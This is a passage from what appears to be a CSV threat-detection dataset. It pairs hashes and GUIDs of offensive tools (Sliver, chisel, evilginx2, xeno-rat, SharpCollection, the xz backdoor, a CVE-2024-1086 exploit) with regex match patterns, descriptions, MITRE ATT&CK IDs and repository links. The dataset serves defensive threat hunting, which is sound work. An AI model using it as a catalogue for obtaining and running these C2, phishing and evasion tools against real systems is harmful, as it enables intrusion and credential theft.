BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*86445d7ef450ddcb190f14c6f7fc8a1a33945c45*",".{0,1000}86445d7ef450ddcb190f14c6f7fc8a1a33945c45.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*865c9da731e9dedc483277985a51af9ef08f736e512447233ac4bec008539443*",".{0,1000}865c9da731e9dedc483277985a51af9ef08f736e512447233ac4bec008539443.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*866e5289337ab033f89bc57c5274c7ca*",".{0,1000}866e5289337ab033f89bc57c5274c7ca.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 
- T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b*",".{0,1000}8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368*",".{0,1000}8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" 
"*86dc38ec63d7ddfab38fe655ac2296f328b1fcf43a070bad92cb6c1d3d721d49*",".{0,1000}86dc38ec63d7ddfab38fe655ac2296f328b1fcf43a070bad92cb6c1d3d721d49.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*86fc2c94f8fa3938e3261d0b9eb4836be289f8ae*",".{0,1000}86fc2c94f8fa3938e3261d0b9eb4836be289f8ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*8704db81460c783dfafccc4414e9346aa6eeadcfd09984c26e5f1e4e895238d3*",".{0,1000}8704db81460c783dfafccc4414e9346aa6eeadcfd09984c26e5f1e4e895238d3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*873fdbf2756b2826ee7946770aacd8945e3d3470cb5ced3a23c36b0a988d1b1e*",".{0,1000}873fdbf2756b2826ee7946770aacd8945e3d3470cb5ced3a23c36b0a988d1b1e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8744313fbf925e7dc5aada01fa6b89589bdac85546a51c766fe51b763c984487*",".{0,1000}8744313fbf925e7dc5aada01fa6b89589bdac85546a51c766fe51b763c984487.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*874dbda99983730fafd8054b29996e692cfe12c4230cb97d3b53e5db4df4238c*",".{0,1000}874dbda99983730fafd8054b29996e692cfe12c4230cb97d3b53e5db4df4238c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*875c428604faaa6f393b263aef783d9cd535b57135d668d949014052132e3c8b*",".{0,1000}875c428604faaa6f393b263aef783d9cd535b57135d668d949014052132e3c8b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8760b515dc5f94eaed37ef0ded50d083cc32e65e5b430089482c00fd40c0c555*",".{0,1000}8760b515dc5f94eaed37ef0ded50d083cc32e65e5b430089482c00fd40c0c555.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*876b33b3871778abc2ac0523ef7ef9a23302eebbac92b193ac564946207f9477*",".{0,1000}876b33b3871778abc2ac0523ef7ef9a23302eebbac92b193ac564946207f9477.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*87904247-C363-4F12-A13A-3DA484913F9E*",".{0,1000}87904247\-C363\-4F12\-A13A\-3DA484913F9E.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
"*879A49C7-0493-4235-85F6-EBF962613A76*",".{0,1000}879A49C7\-0493\-4235\-85F6\-EBF962613A76.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*87ad24ba9c07337abc8310c7107359fdcf86b9e182b7b93e1f375888fb82dfc1*",".{0,1000}87ad24ba9c07337abc8310c7107359fdcf86b9e182b7b93e1f375888fb82dfc1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*87BEF4D7-813E-48BA-96FE-E3A24BF2DC34*",".{0,1000}87BEF4D7\-813E\-48BA\-96FE\-E3A24BF2DC34.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*87c4041617fc7010b7e20630ae48cc8c17dc84cd6fb5c330f0bc92af52baa2fa*",".{0,1000}87c4041617fc7010b7e20630ae48cc8c17dc84cd6fb5c330f0bc92af52baa2fa.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*87c96e5d650e67d985bdbb2bf4be55c94f8b967b180d45c1c073cbcd57cf1ddb*",".{0,1000}87c96e5d650e67d985bdbb2bf4be55c94f8b967b180d45c1c073cbcd57cf1ddb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*88113ededbda181be6c6f9bd4ba8145666b48bf9e9b8dc170e66e884b10fdc91*",".{0,1000}88113ededbda181be6c6f9bd4ba8145666b48bf9e9b8dc170e66e884b10fdc91.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*881D4D67-46DD-4F40-A813-C9D3C8BE0965*",".{0,1000}881D4D67\-46DD\-4F40\-A813\-C9D3C8BE0965.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" 
"*881D4D67-46DD-4F40-A813-C9D3C8BE0965*",".{0,1000}881D4D67\-46DD\-4F40\-A813\-C9D3C8BE0965.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*886c0eac43136acee5b85b22c72965d63faf9b9f70ed28deca9c3b028b22dee8*",".{0,1000}886c0eac43136acee5b85b22c72965d63faf9b9f70ed28deca9c3b028b22dee8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*886de66b761338d87027254c40da3ea0fd9072fc301c1b8fdd2e4d652e231dea*",".{0,1000}886de66b761338d87027254c40da3ea0fd9072fc301c1b8fdd2e4d652e231dea.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*8879933fd0c682fa48bfa79023b5730f6ee8e984e8cde1b275a64b098473e424*",".{0,1000}8879933fd0c682fa48bfa79023b5730f6ee8e984e8cde1b275a64b098473e424.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*88a56a39fa828dee79620714e53285c2c5bfbec814e64ab150d8795b0d78940c*",".{0,1000}88a56a39fa828dee79620714e53285c2c5bfbec814e64ab150d8795b0d78940c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*88B40068-B3DB-4C2F-86F9-8EADC52CFE58*",".{0,1000}88B40068\-B3DB\-4C2F\-86F9\-8EADC52CFE58.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*88babbe96838fcad9b486bd36f4bce32d242848ab4aa71c739fd6338dea37a68*",".{0,1000}88babbe96838fcad9b486bd36f4bce32d242848ab4aa71c739fd6338dea37a68.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*88c940e5e4e3728a9433887cfd7eb308d8d4e5e24f5ab49b3c13dcc595da89d0*",".{0,1000}88c940e5e4e3728a9433887cfd7eb308d8d4e5e24f5ab49b3c13dcc595da89d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*88e3cee91cfda389858ecd70bf3f9b8e45ce7d41761cb7b13075e8d003724007*",".{0,1000}88e3cee91cfda389858ecd70bf3f9b8e45ce7d41761cb7b13075e8d003724007.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*890f13ab9ee7ea722baf0ceb3ee561c0*",".{0,1000}890f13ab9ee7ea722baf0ceb3ee561c0.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*894a784e-e04c-483c-a762-b6c03e744d0b*",".{0,1000}894a784e\-e04c\-483c\-a762\-b6c03e744d0b.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","381","50","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z" "*89873326f393acc1d9c4ff7d897f60db68075d418a034c377a2d72cd1a09c95b*",".{0,1000}89873326f393acc1d9c4ff7d897f60db68075d418a034c377a2d72cd1a09c95b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*89a687f0367983c98008e9bd2d82e6aa579e24f2d702b6912eeae74b21e85dc9*",".{0,1000}89a687f0367983c98008e9bd2d82e6aa579e24f2d702b6912eeae74b21e85dc9.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*89b8e0c1afe4680c8f02e517467a71a4a2559f41792565bd646f0127642782a1*",".{0,1000}89b8e0c1afe4680c8f02e517467a71a4a2559f41792565bd646f0127642782a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*89d3f128432dd85a62c1f1c394dc8a0397ba23c5a193449dabcae0d1f84d3b18*",".{0,1000}89d3f128432dd85a62c1f1c394dc8a0397ba23c5a193449dabcae0d1f84d3b18.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*89eab8092b36ec3ea05291a614742f9f926685f89c2b25fd5804974292255b3b*",".{0,1000}89eab8092b36ec3ea05291a614742f9f926685f89c2b25fd5804974292255b3b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8A15D28C-252A-4FCC-8BBD-BC3802C0320A*",".{0,1000}8A15D28C\-252A\-4FCC\-8BBD\-BC3802C0320A.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access 
tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*8a417e475065810997e9920df3b411696a4d494abb4204921fd6cb54ff455daa*",".{0,1000}8a417e475065810997e9920df3b411696a4d494abb4204921fd6cb54ff455daa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8a586d7528567dec07746cd375daf9cf8828abee9806fda6125d73323d4fbee4*",".{0,1000}8a586d7528567dec07746cd375daf9cf8828abee9806fda6125d73323d4fbee4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*8a5d969cab714560a2c7109d7a70bf653d860b846929d2db55782f4ec2604597*",".{0,1000}8a5d969cab714560a2c7109d7a70bf653d860b846929d2db55782f4ec2604597.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*8a65c348023a1a5555beb0cde66891fd39dcbd8e6fc02c1ce2022ac2afe68a5e*",".{0,1000}8a65c348023a1a5555beb0cde66891fd39dcbd8e6fc02c1ce2022ac2afe68a5e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*8a92acfe944c48f247b50ea26cb82f367e668959c115739c025d1ad4ca59a27a*",".{0,1000}8a92acfe944c48f247b50ea26cb82f367e668959c115739c025d1ad4ca59a27a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379*",".{0,1000}8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege 